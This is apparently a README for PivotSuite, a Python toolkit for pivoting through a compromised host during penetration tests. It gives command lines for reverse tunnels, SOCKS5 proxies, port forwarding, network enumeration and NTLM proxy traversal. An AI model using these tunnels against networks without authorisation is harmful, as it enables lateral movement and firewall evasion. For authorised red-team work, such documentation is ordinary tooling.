PivotSuite

PivotSuite: Hack The Hidden Network – A Network Pivoting Toolkit

It is a portable, platform-independent and powerful network pivoting toolkit, Which helps Red Teamers / Penetration Testers to use a compromised system to move around inside a network. It is a Standalone Utility, Which can use as a Server or as a Client.

PivotSuite as a Server :

If the compromised host is directly accessible (Forward Connection) from Our pentest machine, Then we can run pivotsuite as a server on the compromised machine and access the different subnet hosts from our pentest machine, Which was only accessible from compromised machine.

PivotSuite as a Client :

If the compromised host is behind a Firewall / NAT and isn’t directly accessible from our pentest machine, Then we can run pivotsuite as a server on the pentest machine and pivotsuite as a client on a compromised machine for creating a reverse tunnel (Reverse Connection). Using this we can reach different subnet hosts from our pentest machine, which was only accessible from compromised machine.

Key Features:

1. Supported Forward & Reverse TCP Tunneling
2. Supported Forward & Reverse socks5 Proxy Server
3. UDP over TCP and TCP over TCP Protocol Supported
4. Corporate Proxy Authentication (NTLM) Supported
5. Inbuilt Network Enumeration Functionality, Eg. Host Discovery, Port Scanning, OS Command Execution
6. It allows to get access to different Compromised host and their network, simultaneously (Act as C&C Server)
7. Single Pivoting, Double Pivoting and Multi-level pivoting can perform with the help of PivotSuite.
8. It also works as SSH Dynamic Port Forwarding but in the Reverse Direction.

Advantage Over Other tools:

1. Doesn’t require admin/root access on Compromised host
2. Italso works when a Compromised host is behind a Firewall / NAT When Only Reverse Connection is allowed.
3. No dependency is other than python standard libraries.
4. No Installation Required
5. UDP Port is accessible over TCP

Install

pip install PivotSuite

Use

Example

Case 1 : (Forward TCP Tunneling)

IF the Compromised host is directly accessible from our pentest machine.

Then run PivotSuite as a server on the compromised machine as per our requirements:



    a. Dynamic Port Forwarding (Socks5 Proxy Server) On Compromised machine:



         $  python pivotsuite.py -S -F --server-option SP --server-ip IP --server-port PORT





    b. Single Port Forwarding (TCP/UDP Relay) On Compromised machine :



        $ python pivotsuite.py -S -F --server-option PF --network-protocol T/U --remote-ip IP --remote-port PORT 

          --server-ip IP (local-ip) --server-port PORT (local-port)

Case 2 : (Reverse TCP Tunneling)

IF the Compromised host is behind a Firewall / NAT and directly not accessible from our pentest machine.

Then run PivotSuite as a Server on pentest machine and PivotSuite as a Client on compromised machine.





  i. Run PivotSuite as a Sever On Pentest Machine :



      $ python pivotsute.py -S -W 





  ii. Run PivotSuite as a Client on Compromise Machine as per our requirements:



      a. Dynamic Port Forwarding (Socks5 Proxy Server) On Pentest Machine:



          $ python pivotsuite.py -C -O SP --server-ip IP --server-port PORT



      b. Local / Remote Port Forwarding On Pentest Machine:



           $ python pivotsuite.py -C -O PF  - L / -R (local or remote port forwarding) -P T/U  --local-ip IP 

              --local-port PORT --remote-ip IP --remote-port PORT  --server-ip IP --server-port PORT



      c. Network Enumeration of Compromised Machine:



            $ python pivotsuite.py -C -O NE --server-ip IP --server-port PORT

IF Corporate Proxy Authentication (NTLM) required for reverse connection on Compromised Host :

$ python pivotsuite.py -C -O SP --ntlm-proxy-ip IP --ntlm-proxy-port PORT --username USERNAME --password PASSWORD 

    --server-ip IP --server-port PORT

Copyright (C) 2019 <Manish Gupta>

Source: https://github.com/RedTeamOperations/